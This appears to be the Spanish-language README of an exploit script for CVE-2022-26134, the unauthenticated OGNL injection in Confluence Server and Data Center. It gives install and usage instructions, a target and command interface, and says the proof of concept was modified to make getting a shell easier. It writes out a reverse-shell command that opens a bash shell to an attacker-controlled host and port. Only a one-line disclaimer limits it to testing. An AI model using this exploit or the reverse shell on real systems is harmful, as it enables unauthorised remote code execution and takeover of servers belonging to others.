
Un atacante remoto, sin autenticación en Confluence, puede construir expresiones OGNL para inyectarlas, logrando ejecutar código arbitrario en Confluence Server o Data Center. Se ha modificado el PoC en el script existente para facilitar getshell.
Un atacante remoto, sin autenticación, puede construir expresiones OGNL para inyectar y lograr la ejecución de código arbitrario en Confluence Server o Data Center. Se ha modificado el PoC para facilitar la obtención de un shell. Puerto común: 8090
pip3 install requests
______ _______ ____ ___ ____ ____ ____ __ _ _____ _ _
/ ___\ \ / | ____| |___ \ / _ |___ \|___ \ |___ \ / /_ / |___ /| || |
| | \ \ / /| _| _____ __) | | | |__) | __) _____ __) | '_ \| | |_ \| || |_
| |___ \ V / | |__|_____/ __/| |_| / __/ / __|_____/ __/| (_) | |___) |__ _|
\____| \_/ |_____| |_____|\___|_____|_____| |_____|\___/|_|____/ |_|
usage: CVE-2022-26134.py [-h] -t TARGET -c COMMAND
CVE-2022-26134
optional arguments:
-h, --help show this help message and exit
-t TARGET, --target TARGET
URL objetivo
-c COMMAND, --command COMMAND
Comando a ejecutar (execute command), obtener shell: /bin/bash -c bash -i >& /dev/tcp/{vps ip}/{vps port} 0>&1
python3 CVE-2022-26134.py -t [server ip] -c [command] //执行命令
Este script solo se puede usar para pruebas, no para otros fines.